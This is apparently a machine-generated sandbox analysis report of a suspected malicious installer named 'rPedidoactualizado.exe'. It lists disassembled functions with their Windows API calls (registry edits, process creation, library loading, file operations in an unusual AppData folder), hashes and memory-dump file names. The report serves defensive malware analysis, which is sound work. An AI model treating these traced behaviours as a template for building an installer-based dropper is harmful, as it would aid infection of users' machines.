Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\rPedidoactualizado.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3234529918
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C25
Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 004057CE: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
API String ID: 1892508949-2712461677
Opcode ID: 9e5626dcab178d18660621b241e7a2734acb43fa84c417fb4ea69048e5d5e0e9
Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
Opcode Fuzzy Hash: 9e5626dcab178d18660621b241e7a2734acb43fa84c417fb4ea69048e5d5e0e9
Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E

Function 00406165 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004063D9,80000002), ref: 004061AB
RegCloseKey.KERNELBASE(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,halituses), ref: 004061B6

Strings

: Completed, xrefs: 0040616C

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4

Function 00405880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
CloseHandle.KERNEL32(?), ref: 004058B6

Strings

Error launching installer, xrefs: 00405893

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78

Function 00401FFA Relevance: 4.6, APIs: 3, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c73a460384e056ff9d12a0a60f21d525f10071a0075d6a226261d218d3999c3
Instruction ID: 96c9f76e6636b9c2d25b0b1467c2954fc3cee1ad24e3c7ba74a0f8c29babf82b
Opcode Fuzzy Hash: 3c73a460384e056ff9d12a0a60f21d525f10071a0075d6a226261d218d3999c3
Instruction Fuzzy Hash: 9531C731D00205EACF21AFA1DE4899E7A71BF44354F24813BF115B61E1CBB98952DB69

Function 004023E4 Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0040B5A8,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
RegSetValueExW.KERNELBASE(?,?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CloseValuelstrlen
String ID:
API String ID: 2655323295-0
Opcode ID: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
Opcode Fuzzy Hash: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28

Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040205D
LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 004020EB

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Library$FreeHandleLoadModule
String ID:
API String ID: 2140536961-0
Opcode ID: 85942fc89a7394ec5be02890c795d7ce19105dcf228e749ef0ece73fd9a55274
Instruction ID: 4ef3947a4f3b15eeb1edbcf2825d86a3d57027b1e8ef6f61f5e5c173a0dbc30c
Opcode Fuzzy Hash: 85942fc89a7394ec5be02890c795d7ce19105dcf228e749ef0ece73fd9a55274
Instruction Fuzzy Hash: 54114271D00205ABCF20AFA5CA8859E7A71BF04345F64853BF501F61E0DBB98D91DB69

Function 00402259 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004065DA: FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 004065E5
Part of subcall function 004065DA: FindClose.KERNELBASE(00000000), ref: 004065F1

lstrlenW.KERNEL32 ref: 00402299
lstrlenW.KERNEL32(00000000), ref: 004022A4
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
Instruction ID: bbe877ab11025427faf5f2d41b675fbfdb26c0ea37d129f2242468f609b66021
Opcode Fuzzy Hash: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
Instruction Fuzzy Hash: 74117071D10314AADF10EFF98A4999EB7B8AF04344F14847FA805F72D1D6B8C4418B59

Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 95b9409de080be2480ae3ebee57d62febf19c414c59d57b92fdc5ca9ae51cd4c
Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
Opcode Fuzzy Hash: 95b9409de080be2480ae3ebee57d62febf19c414c59d57b92fdc5ca9ae51cd4c
Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69

Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: ef205e07a954bd81c45d0a02b1537dcbd35f0958168012aad3e58056c5502209
Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
Opcode Fuzzy Hash: ef205e07a954bd81c45d0a02b1537dcbd35f0958168012aad3e58056c5502209
Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
